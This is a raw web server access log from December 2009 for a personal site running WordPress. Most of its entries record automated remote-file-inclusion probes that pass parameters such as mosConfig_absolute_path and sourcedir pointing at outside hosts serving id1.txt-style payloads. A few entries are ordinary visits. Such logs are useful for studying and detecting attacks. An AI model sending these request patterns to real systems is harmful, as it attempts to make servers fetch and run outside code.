65.18.191.237 - - [14/Dec/2009:09:51:34 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:09:51:37 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:52:11 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:52:20 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:30 -0800] "GET /bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:30 -0800] "GET /logs/access_091007.log//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:30 -0800] "GET /logs//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:49 -0800] "GET /logs//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:49 -0800] "GET /bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:49 -0800] "GET /logs/access_091007.log%20%20//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:57 -0800] "GET /logs//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:57 -0800] "GET /bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:52:57 -0800] "GET /logs/access_091007.log%20%20//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:53:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:53:23 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:53:23 -0800] "GET /logs/access_091203.log//skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:07 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:12 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:12 -0800] "GET /logs/access_081129.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:37 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:56 -0800] "GET /logs/access_081129.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:56 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:54:56 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:54:57 -0800] "GET ///appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:54:57 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:54:57 -0800] "GET /logs/access_090523.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:00 -0800] "GET ///appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:00 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:00 -0800] "GET /logs/access_090523.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:14 -0800] "GET /logs/access_080315.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:14 -0800] "GET /logs/access_080315.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:55:22 -0800] "GET /logs/access_090620.log//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:29 -0800] "GET ///appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:29 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:30 -0800] "GET /logs/access_090523.log%20%20////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:38 -0800] "GET ///appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:38 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:38 -0800] "GET /logs/access_090523.log%20%20////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:41 -0800] "GET /logs/access_080315.log%20%20////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:55:55 -0800] "GET /logs/access_080315.log%20%20////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:56:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:56:00 -0800] "GET /logs/access_091203.log//skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.201.185 - - [14/Dec/2009:09:56:00 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:09:56:05 -0800] "GET /logs/access_091123.log//bbs/skin/pds_pic/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:08 -0800] "GET /logs/access_090223.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:08 -0800] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 130218 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:10 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:10 -0800] "GET /logs/access_090523.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:13 -0800] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 14920 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:15 -0800] "GET /logs/access_090523.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:16 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:16 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:16 -0800] "GET /logs/access_091129.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:18 -0800] "GET ///appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:18 -0800] "GET /logs/access_080912.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:18 -0800] "GET /logs////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:18 -0800] "GET /logs/access_091129.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:18 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:18 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:20 -0800] "GET /logs/access_090223.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:20 -0800] "GET /logs/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 130218 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:20 -0800] "GET /?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 200 14919 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:24 -0800] "GET /logs/access_091111.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:56:27 -0800] "GET /logs/access_091111.log//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:28 -0800] "GET /logs/access_080315.log////appserv/main.php?appserv_root=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:56:30 -0800] "GET /logs/access_080912.log/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:40 -0800] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:40 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:40 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:42 -0800] "GET /logs/access_090713.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:42 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130225 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:09:56:44 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:44 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14939 "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:45 -0800] "GET /logs/access_080701.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:49 -0800] "GET /logs/access_071228.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:49 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:49 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:51 -0800] "GET /logs/access_090713.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:51 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14938 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:56:51 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130225 "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:09:56:54 -0800] "GET /logs/access_080701.log/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:57:32 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:57:32 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:57:33 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:57:54 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:57:56 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:09:58:06 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:09:58:13 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:58:23 -0800] "GET /logs/access_081129.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:58:26 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:09:58:36 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:09:58:37 -0800] "GET /logs/access_080426.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:09:58:37 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:09:58:37 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:09:58:38 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.124.224.98 - - [14/Dec/2009:09:58:39 -0800] "GET /logs/access_081110.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://pushkinhouse.readershp.com/zeroboard/data/teature1/1194568816/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:09:58:39 -0800] "GET /logs/access_090620.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:58:58 -0800] "GET /logs/access_090223.log%20%20/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:58:58 -0800] "GET /logs/access_080916.log%20%20/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:59:15 -0800] "GET /logs/access_091111.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:59:15 -0800] "GET /logs/access_091129.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:59:23 -0800] "GET /logs/access_090223.log%20%20/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [14/Dec/2009:09:59:23 -0800] "GET /logs/access_080916.log%20%20/?sourcedir=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:59:38 -0800] "GET /logs/access_090930.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:59:38 -0800] "GET /logs/access_090508.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:59:42 -0800] "GET /logs/access_091129.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.60.186 - - [14/Dec/2009:09:59:42 -0800] "GET /logs/access_091111.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.flowerskmv.ru//fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:59:44 -0800] "GET /logs/access_090930.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:09:59:44 -0800] "GET /logs/access_090508.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:09:59:50 -0800] "GET /logs/access_090322.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:10:00:16 -0800] "GET /logs/access_080524.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:01:04 -0800] "GET /logs/access_071228.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:10:01:08 -0800] "GET /logs/access_080701.log%20%20/admin/editor2/spaw_control.class.php?spaw_root=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET / HTTP/1.1" 200 14863 "http://advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "www.dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9759 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
24.22.69.180 - - [14/Dec/2009:10:01:44 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.3; .NET CLR 3.0.30729)" "dmulk.com"
